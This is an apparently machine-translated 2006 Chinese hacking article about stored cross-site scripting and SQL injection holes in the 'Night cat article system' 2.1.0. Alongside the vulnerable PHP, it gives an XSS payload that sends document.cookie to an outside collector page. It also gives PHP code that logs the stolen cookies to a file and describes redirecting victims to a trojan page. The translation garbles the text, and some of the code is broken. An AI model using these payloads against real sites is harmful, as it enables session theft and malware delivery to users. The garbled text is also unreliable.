Night cat article system Version 2.1.0 cross site & injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:6220066059
Type myhack58
Reporter 佚名
Modified 2006-01-04T00:00:00


Articles have been published in the<<hack the x-Files>>2 0 0 6 in the first period Cross-site vulnerability: night cat article system code amount is not very large, then we will from the most basic to start it, open the registration page to register. php see the following code if ($_POST[action] == "adduser"):

?& gt;

<br><br><br><center><table cellpadding=4 cellspacing=1 border=0 width=7 0%> <tr><td bgcolor=#8 7 8 7 8 7 align=center> <font color=white>user registration</font> </td></tr> <tr><td bgcolor=#efefef>

<? $birthday = $b_year."-".$ b_month."-".$ b_day; register($setting[user_reg_usergroupid],$_POST[username],$_POST[password],$_POST[email],$_POST[sex],$_POST[birthday],$_POST[homepage],$_POST[icq],$_POST[oicq],$_POST[race],$_POST[signature],$_POST[ipaddress],$_POST[realname],$_POST[realname1],$_POST[organization],$_POST[organization1],$_POST[country],$_POST[country1],$_POST[province], $_POST[province1],$_POST[city],$_POST[city1],$_POST[address],$_POST[address1],$_POST[zip],$_POST[phone],$_POST[fax],$_POST[idnumber],$_POST[referrerid]); ?& gt;

Is a special function register()to be submitted, probably looked at the submitted variables, the first user_reg_usergroupid as if a little tricks unfortunately not our submission, but we also can not be forged, then we will look at the registration function of how the definition of the open function. php see the following code, The code is too long here just to give out key statements: the

$sql = "INSERT INTO $ymcity_user_table (usergroupid,username,password,email,sex,birthday,homepage,icq,oicq,race,experience,money,signature,joindate,ipaddress,realname,realname1,organization,organization1,country,country1,province,province1,city,city1,address,address1,zip,phone,fax,idnumber,referrerid) VALUES (’$usergroupid’,’$username’,’$password’,’$email’,’$sex’,’$birthday’,’$homepage’,’$icq’,’$oicq’, ’$race’,’$experience’,’$money’,’$signature’,’$timenow’,’$ipaddress’,’$realname’,’$realname1’,’$organization’,’$organization1’,’$country’,’$country1’,’$province’,’$province1’,’$city’,’$city1’,’$address’,’$address1’,’$zip’,’$phone’,’$fax’,’$idnumber’,’$referrerid’)"; mysql_db_query($dbname,$sql);

Function direct access to our submission variables and then just come right of the insertion to the database, and not any want to filter means, so that when we register the information, all submissions will be intact written into the database, when we try to access the registration information, if we write is cross-site code, it will be the browser will parse out the vulnerability it creates.

Using method:<div>tag can be surrounded by any kind of HTML markup, it will in its start tag to the end tag between all the markers play a role, for<script>of course, we can thus write, in order to let everyone see I put the function written separately <div align=center><script>windows. open(’’+ document. cookie);</script> <script>alert(’the X-Files site!’); self. location=’’;</script></div>http://www. hackerxfiles. com/cookies. php is assuming that we steal the cookie page, cookie. the php code is as follows:<? php $cookie=getenv("QUERY_STRING"); if($cookie){ $cookie=urldecode($cookie);} $fp=@fopen("xY7.txt","a+"); @fwrite($fp,$cookie;"\n"); @fclose($fp); ?& gt;so we steal the cookie will be written to xY7. txt, after talks with a prompt box, point to determine after it will go to the We assume that the hanging horse page http://www. hackerxfiles. com/muma. htm.

Injection vulnerabilities: the vulnerabilities page of the article. php first 3 6 line, the code is as follows: if ($_GET[articleid] > "0"): $sql = "SELECT * FROM $ymcity_article_table WHERE articleid=’$_GET[articleid]’"; $result = mysql_db_query($dbname, $sql); $row = mysql_fetch_array($result); The program does not filter articleid this variable, we can just note....-_-!